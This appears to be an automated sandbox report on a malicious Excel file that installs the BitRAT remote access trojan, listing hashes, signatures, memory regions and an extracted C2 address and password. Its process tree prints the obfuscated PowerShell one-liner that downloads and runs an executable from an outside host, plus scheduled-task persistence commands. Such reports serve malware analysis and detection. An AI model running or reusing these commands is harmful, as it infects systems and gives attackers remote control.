Analysis

  • max time kernel
    125s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2023 15:56

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls

  • Size

    100KB

  • MD5

    55e0c24ad93d53e9a161d813f09d9e9a

  • SHA1

    e3b6b703b99801b32a4c9754d591383dc30432bb

  • SHA256

    c1f218a24f82946584e59d64abc9762e85614803fe82c432d21678d1ae000db5

  • SHA512

    55127c6cbb0a7120f86378feb4057ccfc5341b22f902fffd14121cde404002de6422ebc5b346ae8ea8967d458d4581c68f7ae97d6b0ff85ad10d38aa38071375

  • SSDEEP

    3072:QrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnADtJE2zuxq+fr9wBLa71ba2ryLTHeYR:2xEtjPOtioVjDGUU1qfDlavx+W2QnApF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/YeTYSYp0DR/abe.e^xe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/YeTYSYp0DR/abe.exe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Users\Public\gg1c8.exe
          "C:\Users\Public\gg1c8.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:576
          • C:\Users\Public\gg1c8.exe
            "C:\Users\Public\gg1c8.exe"
            5⤵
            • Executes dropped EXE
            PID:2220
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 188
              6⤵
              • Program crash
              PID:2492
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\gg1c8.exe" "C:\Users\Admin\AppData\Roaming\state\state.exe"
            5⤵
              PID:3228
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3708
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:2772
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\state"
              5⤵
                PID:1800
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2220 -ip 2220
        1⤵
          PID:3748
        • C:\Users\Admin\AppData\Roaming\state\state.exe
          C:\Users\Admin\AppData\Roaming\state\state.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Users\Admin\AppData\Roaming\state\state.exe
            "C:\Users\Admin\AppData\Roaming\state\state.exe"
            2⤵
            • Executes dropped EXE
            PID:5072
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 188
              3⤵
              • Program crash
              PID:3660
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\state"
            2⤵
              PID:2524
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4200
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
                3⤵
                • Creates scheduled task(s)
                PID:3640
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c copy "C:\Users\Admin\AppData\Roaming\state\state.exe" "C:\Users\Admin\AppData\Roaming\state\state.exe"
              2⤵
                PID:2660
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5072 -ip 5072
              1⤵
                PID:880

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgubstjo.twu.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Roaming\state\state.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • C:\Users\Admin\AppData\Roaming\state\state.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • C:\Users\Admin\AppData\Roaming\state\state.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • C:\Users\Admin\AppData\Roaming\state\state.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • C:\Users\Public\gg1c8.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • C:\Users\Public\gg1c8.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • C:\Users\Public\gg1c8.exe
                Filesize

                7.6MB

                MD5

                18e07c4772a2687ee06a434ffef9572f

                SHA1

                ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

                SHA256

                ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

                SHA512

                8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

              • memory/576-73-0x00000000061D0000-0x0000000006774000-memory.dmp
                Filesize

                5.6MB

              • memory/576-75-0x0000000007780000-0x0000000007F0A000-memory.dmp
                Filesize

                7.5MB

              • memory/576-74-0x0000000005C10000-0x0000000005C20000-memory.dmp
                Filesize

                64KB

              • memory/576-71-0x0000000074940000-0x00000000750F0000-memory.dmp
                Filesize

                7.7MB

              • memory/576-72-0x00000000009E0000-0x000000000117E000-memory.dmp
                Filesize

                7.6MB

              • memory/576-84-0x0000000074940000-0x00000000750F0000-memory.dmp
                Filesize

                7.7MB

              • memory/2220-77-0x0000000000BA0000-0x0000000000F6E000-memory.dmp
                Filesize

                3.8MB

              • memory/2220-82-0x0000000000BA0000-0x0000000000F6E000-memory.dmp
                Filesize

                3.8MB

              • memory/2220-87-0x0000000000BA0000-0x0000000000F6E000-memory.dmp
                Filesize

                3.8MB

              • memory/2344-19-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-3-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-20-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-18-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-21-0x00007FFB86A00000-0x00007FFB86A10000-memory.dmp
                Filesize

                64KB

              • memory/2344-22-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-23-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-31-0x000002313D1E0000-0x000002313E1B0000-memory.dmp
                Filesize

                15.8MB

              • memory/2344-32-0x000002313D1E0000-0x000002313E1B0000-memory.dmp
                Filesize

                15.8MB

              • memory/2344-33-0x000002313D1E0000-0x000002313E1B0000-memory.dmp
                Filesize

                15.8MB

              • memory/2344-34-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-1-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-17-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-2-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-46-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-4-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-50-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-107-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-106-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-52-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-53-0x000002313D1E0000-0x000002313E1B0000-memory.dmp
                Filesize

                15.8MB

              • memory/2344-54-0x000002313D1E0000-0x000002313E1B0000-memory.dmp
                Filesize

                15.8MB

              • memory/2344-57-0x000002313D1E0000-0x000002313E1B0000-memory.dmp
                Filesize

                15.8MB

              • memory/2344-103-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-105-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-104-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-102-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-16-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-14-0x00007FFB86A00000-0x00007FFB86A10000-memory.dmp
                Filesize

                64KB

              • memory/2344-101-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-15-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-13-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-12-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-11-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-10-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-9-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-8-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-7-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-5-0x00007FFBC8F70000-0x00007FFBC9165000-memory.dmp
                Filesize

                2.0MB

              • memory/2344-6-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/2344-0-0x00007FFB88FF0000-0x00007FFB89000000-memory.dmp
                Filesize

                64KB

              • memory/3968-48-0x0000026AB8970000-0x0000026AB8980000-memory.dmp
                Filesize

                64KB

              • memory/3968-45-0x00007FFBA0270000-0x00007FFBA0D31000-memory.dmp
                Filesize

                10.8MB

              • memory/3968-60-0x0000026AB8970000-0x0000026AB8980000-memory.dmp
                Filesize

                64KB

              • memory/3968-59-0x0000026AB8970000-0x0000026AB8980000-memory.dmp
                Filesize

                64KB

              • memory/3968-58-0x00007FFBA0270000-0x00007FFBA0D31000-memory.dmp
                Filesize

                10.8MB

              • memory/3968-51-0x0000026AB8970000-0x0000026AB8980000-memory.dmp
                Filesize

                64KB

              • memory/3968-61-0x0000026AB8970000-0x0000026AB8980000-memory.dmp
                Filesize

                64KB

              • memory/3968-49-0x0000026AB8970000-0x0000026AB8980000-memory.dmp
                Filesize

                64KB

              • memory/3968-70-0x00007FFBA0270000-0x00007FFBA0D31000-memory.dmp
                Filesize

                10.8MB

              • memory/3968-40-0x0000026AB8880000-0x0000026AB88A2000-memory.dmp
                Filesize

                136KB

              • memory/4784-111-0x0000000005A20000-0x0000000005A30000-memory.dmp
                Filesize

                64KB

              • memory/4784-110-0x0000000074940000-0x00000000750F0000-memory.dmp
                Filesize

                7.7MB

              • memory/4784-123-0x0000000074940000-0x00000000750F0000-memory.dmp
                Filesize

                7.7MB

              • memory/5072-117-0x00000000011B0000-0x000000000157E000-memory.dmp
                Filesize

                3.8MB

              • memory/5072-122-0x00000000011B0000-0x000000000157E000-memory.dmp
                Filesize

                3.8MB